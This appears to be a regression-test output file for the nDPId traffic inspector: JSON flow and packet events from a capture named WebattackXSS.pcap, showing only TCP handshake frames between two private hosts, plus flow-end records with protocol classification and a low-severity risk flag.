-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1499347074269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347074269,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NB1AAD4GkbusEAABwKgKMtBcAFD4fmQePNHKVoAQAOVT5AAAAQEICgE5UAID4yF4"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347075596,"flow_last_seen":1499347075596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347075596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1499347075596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347075596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KAdAAD4GncmsEAABwKgKMtBqAFA4KXlJAAAAAKACchCKTwAAAgQFtAQCCAoBOVFOAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1499347075597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347075597,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0GplJM47OCl5SqAScSAxJwAAAgQFtAQCCAoD4yLEATlRTgEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1499347075597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347075597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KAhAAD4GndCsEAABwKgKMtBqAFA4KXlKZSTOPIAQAOXQLgAAAQEICgE5UU4D4yLE"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347078168,"flow_last_seen":1499347078168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347078168,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1499347078168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347078168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VtlAAD4GbvesEAABwKgKMtCEAFCbYgUIAAAAAKACchCYugAAAgQFtAQCCAoBOVPRAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1499347078168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347078168,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0IRJPKyYm2IFCaAScSB6mgAAAgQFtAQCCAoD4yVHATlT0QEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1499347078169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347078169,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VtpAAD4Gbv6sEAABwKgKMtCEAFCbYgUJSTysmYAQAOUZogAAAQEICgE5U9ED4yVH"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347079449,"flow_last_seen":1499347079449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347079449,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1499347079449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347079449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81tZAAD4G7vmsEAABwKgKMtCSAFDwQYPHAAAAAKACchDDzQAAAgQFtAQCCAoBOVURAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1499347079449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347079449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0JKY6hHr8EGDyKAScSDvawAAAgQFtAQCCAoD4yaIATlVEQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1499347079450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347079450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01tdAAD4G7wCsEAABwKgKMtCSAFDwQYPImOoR7IAQAOWOcwAAAQEICgE5VRED4yaI"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":971,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347080793,"flow_last_seen":1499347080793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347080793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1499347080793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347080793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x4ZAAD4G\/kmsEAABwKgKMtCgAFDV9pHnAAAAAKACchDOmgAAAgQFtAQCCAoBOVZhAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1499347080793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347080793,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0KAcF4FK1faR6KAScSAGXQAAAgQFtAQCCAoD4yfYATlWYQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1499347080794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347080794,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x4dAAD4G\/lCsEAABwKgKMtCgAFDV9pHoHBeBS4AQAOWlZAAAAQEICgE5VmED4yfY"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347082084,"flow_last_seen":1499347082084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347082084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1499347082084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347082084,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rj9AAD4GF5GsEAABwKgKMtCuAFC6z\/mcAAAAAKACchCAvAAAAgQFtAQCCAoBOVejAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":981,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1499347082084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347082084,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0K6mztSPus\/5naAScSDZPwAAAgQFtAQCCAoD4ykaATlXowEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1499347082085,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347082085,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rkBAAD4GF5isEAABwKgKMtCuAFC6z\/mdps7UkIAQAOV4RgAAAQEICgE5V6QD4yka"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347083358,"flow_last_seen":1499347083358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347083358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1499347083358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347083358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81M5AAD4G8QGsEAABwKgKMtC8AFCsV4wsAAAAAKACchD7VwAAAgQFtAQCCAoBOVjiAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1499347083358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347083358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0LzW0\/50rFeMLaAScSD4sQAAAgQFtAQCCAoD4ypZATlY4gEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1499347083359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347083359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01M9AAD4G8QisEAABwKgKMtC8AFCsV4wt1tP+dYAQAOWXuQAAAQEICgE5WOID4ypZ"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347084644,"flow_last_seen":1499347084644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347084644,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1499347084644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347084644,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8o6RAAD4GIiysEAABwKgKMtDKAFAgx\/mHAAAAAKACchAYPgAAAgQFtAQCCAoBOVojAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1499347084644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347084644,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Mrcl6UQIMf5iKAScSBn9wAAAgQFtAQCCAoD4yuaATlaIwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1499347084645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347084645,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0o6VAAD4GIjOsEAABwKgKMtDKAFAgx\/mI3JelEYAQAOUG\/gAAAQEICgE5WiQD4yua"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347087256,"flow_last_seen":1499347087256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347087256,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1499347087256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347087256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8beFAAD4GV++sEAABwKgKMtDkAFAnsDFRAAAAAKACchDW5AAAAgQFtAQCCAoBOVywAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1499347087256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347087256,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0OTlcRoYJ7AxUqAScSCmLwAAAgQFtAQCCAoD4y4nATlcsAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1499347087257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347087257,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0beJAAD4GV\/asEAABwKgKMtDkAFAnsDFS5XEaGYAQAOVFNgAAAQEICgE5XLED4y4n"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347088552,"flow_last_seen":1499347088552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1499347088552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA892FAAD4Gzm6sEAABwKgKMtDyAFAECKqUAAAAAKACchB\/9gAAAgQFtAQCCAoBOV31AAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1499347088552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0PJdbGlkBAiqlaAScSCGtgAAAgQFtAQCCAoD4y9rATld9QEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1499347088553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347088553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA092JAAD4GznWsEAABwKgKMtDyAFAECKqVXWxpZYAQAOUlvgAAAQEICgE5XfUD4y9r"} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347091102,"flow_last_seen":1499347091102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347091102,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1499347091102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347091102,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uhVAAD4GC7usEAABwKgKMtEMAFDkONpnAAAAAKACchBtWwAAAgQFtAQCCAoBOWByAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1499347091102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347091102,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0QySpl9e5DjaaKAScSBGaQAAAgQFtAQCCAoD4zHpATlgcgEDAwc="} 